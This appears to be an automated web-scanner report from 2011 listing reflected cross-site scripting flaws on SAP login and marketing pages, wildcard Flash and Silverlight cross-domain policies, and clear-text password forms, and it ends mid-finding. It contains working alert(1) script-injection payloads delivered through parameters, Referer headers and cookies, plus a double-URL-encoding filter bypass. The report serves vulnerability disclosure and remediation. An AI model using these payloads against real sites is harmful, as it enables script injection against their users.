<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... q2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D74723"><a>f29ab74680&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1"> ...[SNIP]...
3.131. https://www.sme.sap.com/irj/sme/cpslogon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.sme.sap.com
Path:
/irj/sme/cpslogon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45e84"><a>2f50f453e03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg== SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw== SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da Expires: 0 Content-Length: 33752 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:35:23 GMT Connection: keep-alive Set-Cookie: PortalAlias=sme; Path=/; secure
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... RFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut&45e84"><a>2f50f453e03=1" method="post" class="loginform" accept-charset="ISO-8859-1"> ...[SNIP]...
3.132. https://www.sme.sap.com/irj/sme/logon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.sme.sap.com
Path:
/irj/sme/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a93"><a>335e6fbb19b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg== SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw== SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da Expires: 0 Content-Length: 33788 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:34:19 GMT Connection: keep-alive Set-Cookie: PortalAlias=sme; Path=/; secure
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <select onchange="location.href='/irj/sme/logon?a7a93"><a>335e6fbb19b=1&language='+document.forms['languageform'].elements[0].value"> ...[SNIP]...
3.133. https://www.sme.sap.com/irj/sme/memberlogin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.sme.sap.com
Path:
/irj/sme/memberlogin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb60"><a>b8c345a2d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1 HTTP/1.1 Host: www.sme.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg== SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw== SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4 Expires: 0 Date: Sat, 15 Oct 2011 15:05:29 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=sme; Path=/; secure Content-Length: 33403
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <select onchange="location.href='/irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1&language='+document.forms['languageform'].elements[0].value"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b04'%3balert(1)//13edec9a65 was submitted in the Referer HTTP header. This input was echoed as e6b04';alert(1)//13edec9a65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df was submitted in the Referer HTTP header. This input was echoed as fd26d"><script>alert(1)</script>85fde43dbf4c2d2df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /sme/contactsap/index.epx?renderableItem=%2Fshow%2F10 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.sap.com Connection: Keep-Alive Cache-Control: no-cache Referer: http://www.google.com/search?hl=en&q=fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:27:37 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:27:37 GMT; path=/ Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3dfd26d%252522%25253e%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253e85fde43dbf4c2d2df; domain=.sap.com; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:27:37 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:27:38 GMT Content-Length: 87820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script language ...[SNIP]... <a href="/search?hl=en&q=fd26d"><script>alert(1)</script>85fde43dbf4c2d2df" onmouseover="window.status='Cancel';return true;" onmouseout="window.status='';return true;"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed84849f1e63 was submitted in the Referer HTTP header. This input was echoed as 37f8e"><script>alert(1)</script>d84849f1e63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the _mkto_trk cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85bc"><script>alert(1)</script>8f8092d2a75 was submitted in the _mkto_trk cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the HumanClickKEY cookie is copied into the HTML document as plain text between tags. The payload 322fe<script>alert(1)</script>66c84936f43 was submitted in the HumanClickKEY cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the pmelayerurl cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49b75"%3balert(1)//cd3cd8afedf was submitted in the pmelayerurl cookie. This input was echoed as 49b75";alert(1)//cd3cd8afedf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 15 Oct 2011 12:05:08 GMT Expires: Sun, 16 Oct 2011 12:05:08 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 8387
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com
Response
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=-1; path=/; expires=Sat, 02-Oct-2021 13:47:02 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: leads.demandbase.com
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 14:19:09 GMT Server: Apache Last-Modified: Wed, 10 Aug 2011 06:02:39 GMT ETag: "9064-c9-4aa206d767dc0" Accept-Ranges: bytes Content-Length: 201 Vary: Accept-Encoding Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omnituremarketing.d1.sc.omtrdc.net
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 13:47:21 GMT Server: Omniture DC/2.0.0 xserver: www337 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omnituremarketing.tt.omtrdc.net
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Sat, 15 Oct 2011 13:47:03 GMT Accept-Ranges: bytes ETag: W/"201-1315435999000" Connection: close Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omniturestaging.staging.tt.omtrdc.net
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Sat, 15 Oct 2011 13:47:09 GMT Accept-Ranges: bytes ETag: W/"201-1318276878000" Connection: close Last-Modified: Mon, 10 Oct 2011 20:01:18 GMT Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.mathtag.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/cross-domain-policy P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xc91 3217 Connection: keep-alive Content-Length: 215
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: sap.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 14:24:58 GMT Server: Omniture DC/2.0.0 xserver: www363 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.2mdn.net
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 15 Oct 2011 11:49:04 GMT Expires: Sat, 15 Oct 2011 11:25:04 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 9351 Cache-Control: public, max-age=86400
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pubads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT Date: Sat, 15 Oct 2011 07:13:32 GMT Expires: Sun, 16 Oct 2011 07:13:32 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 25882 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.connect.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-FB-Server: 10.33.29.104 Connection: close Content-Length: 1590
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-FB-Server: 10.64.156.45 Connection: close Content-Length: 1590
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.sap.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=7200 Content-Type: text/xml Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT Accept-Ranges: bytes ETag: "66f151c654c1cb1:0" Server: Microsoft-IIS/7.5 p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 14:20:47 GMT Connection: close Content-Length: 765
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.sap.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=7200 Content-Type: text/xml Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT Accept-Ranges: bytes ETag: "66f151c654c1cb1:0" Server: Microsoft-IIS/7.5 p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 14:24:29 GMT Connection: close Content-Length: 765
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.sapphirenow.com
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 Content-Type: text/xml Date: Sat, 15 Oct 2011 14:23:03 GMT Accept-Ranges: bytes ETag: "fce0a340e329cc1:0" Connection: close Last-Modified: Mon, 13 Jun 2011 16:02:10 GMT X-Powered-By: ASP.NET Content-Length: 331
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: omnituremarketing.d1.sc.omtrdc.net
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 13:47:21 GMT Server: Omniture DC/2.0.0 xserver: www337 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: sap.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 14:24:58 GMT Server: Omniture DC/2.0.0 xserver: www379 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: static.2mdn.net
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 15 Oct 2011 14:24:55 GMT Expires: Sun, 16 Oct 2011 14:24:55 GMT Cache-Control: public, max-age=86400 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET / HTTP/1.1 Host: www.sapbusinessoptimizer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:04:28 GMT Server: Apache Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 12285
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Home</title> <meta ...[SNIP]... </ul>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/scn/downloads
The form contains the following password field:
j_password
Request
GET /irj/scn/downloads HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c Expires: 0 Date: Sat, 15 Oct 2011 15:04:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=scn; Path=/ Content-Length: 61519
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/scn/index
The form contains the following password field:
j_password
Request
GET /irj/scn/index HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f Expires: 0 Date: Sat, 15 Oct 2011 15:04:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=scn; Path=/ Content-Length: 58094
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/scn/logon
The form contains the following password field:
j_password
Request
